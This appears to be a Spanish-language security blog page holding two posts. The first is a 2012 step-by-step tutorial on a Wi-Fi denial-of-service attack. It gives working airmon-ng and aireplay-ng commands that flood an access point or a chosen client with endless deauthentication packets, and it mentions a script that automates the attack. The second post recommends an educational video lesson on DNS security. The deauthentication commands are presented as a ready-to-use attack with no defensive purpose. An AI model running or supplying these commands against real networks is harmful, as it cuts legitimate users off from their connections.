Mostrando las entradas con la etiqueta DNS. Mostrar todas las entradas
Mostrando las entradas con la etiqueta DNS. Mostrar todas las entradas

2012/03/09

[Ataque DoS Wireless] Denegación de Servicio a una Red Wi-fi

El objetivo de una Denegación de Servicio a una Red Wi-fi es dejar a los usuarios legítimos de una red Wi-fi sin poder acceder a Internet, esto se logra inundando con paquetes de deautenticación al punto de acceso y/o al cliente.

Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningún cliente o atacando solamente a un cliente en específico.

0.- Preliminar:
Primero ponemos la tarjeta de red en modo monitor:
airmon-ng start wlan0
Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en específico:
airmon-ng -c 5 mon0
Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

1.- DoS al punto de acceso:
 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.
aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

 2.- DoS al Cliente:
 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en específico.
aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

Si esto no les pareció lo suficientemente fácil, Abdulla Aleid realizo un pequeño script que automatiza todo este proceso, pero es un poco más efectivo ya que envia solo 100 paquetes de deautenticación, pero con un loop infinito que sobrecarga aun más la red Wi-fi:


Demostración del funcionamiento del Script:




Fuente: http://www.blackploit.com

2012/03/01

En Intypedia. Nuevo vídeo, lección 13. Seguridad en DNS

Al igual que en anteriores ocasiones, os recomendamos una nueva lección de Intypedia (Enciclopedia de Seguridad de la Información). En este caso, está orientada a la seguridad en DNS. Por Javier Osuna García‐Malo de Molina (GMV – Jefe de División de Consultoría de Seguridad y Proceso).
Según podemos leer en el resumen de esta lección;
Hola Bernardo, esta mañana la agencia de viajes donde trabaja una amiga ha tenido un
problema con su página Web y la forma en la que accedían sus clientes. He mirado su página y
parece que un atacante se ha aprovechado del funcionamiento del sistema DNS para simular la
página web de la agencia. Su intención era suplantarles y robar información de sus clientes.
Como no he estudiado detenidamente cómo funciona internamente DNS, ¿podrías
aconsejarme algo para orientar a mi amiga?
Información de apoyo
Guión [PDF][562KB]
Diapositivas [PDF][348KB]
Ejercicios [PDF][531KB]